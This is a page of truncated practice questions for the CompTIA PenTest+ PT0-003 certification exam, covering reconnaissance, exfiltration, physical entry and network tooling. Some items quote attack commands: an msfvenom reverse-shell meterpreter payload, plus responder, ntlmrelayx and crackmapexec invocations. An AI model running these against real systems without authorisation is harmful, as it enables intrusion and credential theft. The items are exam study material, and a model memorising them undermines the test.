PT0-003 exam

While conducting a reconnaissance activity, a penetration tester extracts the following information: Emails: - [email protected] - [email protected] - [email protected] Which of the following risks should the tester use to leverage an attack as the next step in the security assessment?A . Unauthorized access to the networkB . Exposure of sensitive...

A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?A . Apply UTF-8 to the data and send over a tunnel to TCP port 25.B . Apply...

A penetration tester plans to conduct reconnaissance during an engagement using readily available resources. Which of the following resources would most likely identify hardware and software being utilized by the client?A . Cryptographic flawsB . Protocol scanningC . Cached pagesD . Job boardsView AnswerAnswer: D Explanation: To conduct reconnaissance and...

As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands. Which of the following techniques would the penetration tester most likely use to access the sensitive data?A . Logic bombB . SQL injectionC . Brute-force...

A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to...

A penetration tester needs to collect information over the network for further steps in an internal assessment. Which of the following would most likely accomplish this goal?A . ntlmrelayx.py -t 192.168.1.0/24 -1 1234B . nc -tulpn 1234 192.168.1.2C . responder.py -I eth0 -wPD . crackmapexec smb 192.168.1.0/24View AnswerAnswer: C Explanation:...

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would...

A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the tester using?A . OWASP MASVSB . OSSTMMC . MITRE ATT&CKD . CRESTView AnswerAnswer: B Explanation: The OSSTMM (Open Source Security...

A penetration tester writes the following script to enumerate a 1724 network: 1 #!/bin/bash 2 for i in {1..254}; do 3 ping -c1 192.168.1.$i 4 done The tester executes the script, but it fails with the following error: -bash: syntax error near unexpected token `ping' Which of the following should...

During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward. Which of the following types of attacks is this an example...